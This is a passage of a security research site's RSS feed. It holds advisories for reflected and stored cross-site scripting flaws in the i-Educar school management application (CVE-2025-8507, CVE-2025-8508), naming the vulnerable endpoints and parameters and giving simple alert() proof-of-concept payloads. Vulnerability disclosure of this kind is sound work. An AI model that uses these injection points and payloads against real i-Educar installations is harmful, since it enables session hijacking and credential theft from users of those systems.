&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8507</title>
        <link>https://www.cvehunters.com/p/cve-2025-8507/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8507/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8507-multiples-cross-site-scripting-xss-reflected-in-endpoint-intraneteducar_funcao_lstphp&amp;#34;&amp;gt;CVE-2025-8507: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8507/image.png&amp;#34;
	width=&amp;#34;963&amp;#34;
	height=&amp;#34;838&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8507/image_hu_c32e7fef2db934c5.png 480w, /p/cve-2025-8507/image_hu_bf469db527e5022b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;275px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The same issue happens to &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8507-multiples-cross-site-scripting-xss-reflected-in-endpoint-intraneteducar_funcao_lstphp&amp;#34;&amp;gt;CVE-2025-8507: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8507&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_funcao_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;nm_funcao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8507/image.png&amp;#34;
	width=&amp;#34;963&amp;#34;
	height=&amp;#34;838&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8507/image_hu_c32e7fef2db934c5.png 480w, /p/cve-2025-8507/image_hu_bf469db527e5022b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;114&amp;#34;
		data-flex-basis=&amp;#34;275px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The same issue happens to &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8508</title>
        <link>https://www.cvehunters.com/p/cve-2025-8508/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8508/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-intraneteducar_avaliacao_desempenho_cadphp&amp;#34;&amp;gt;CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8508-multiples-cross-site-scripting-xss-stored-in-endpoint-intraneteducar_avaliacao_desempenho_cadphp&amp;#34;&amp;gt;CVE-2025-8508: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8508&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_avaliacao_desempenho_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8508/image.png&amp;#34;
	width=&amp;#34;737&amp;#34;
	height=&amp;#34;887&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8508/image_hu_2db57f13ab8e6adc.png 480w, /p/cve-2025-8508/image_hu_60c2e044653244a7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;83&amp;#34;
		data-flex-basis=&amp;#34;199px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The payload was submitted via the &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; fields and stored successfully. When the page displaying these values is accessed, the script is executed in the context of the user&amp;#39;s browser session, confirming the presence of a stored XSS vulnerability.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 03 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8509</title>
        <link>https://www.cvehunters.com/p/cve-2025-8509/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8509/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8509-cross-site-scripting-xss-stored-endpoint-intraneteducar_servidor_cadphp-parameter-matricula&amp;#34;&amp;gt;CVE-2025-8509: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/intranet/educar_servidor_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
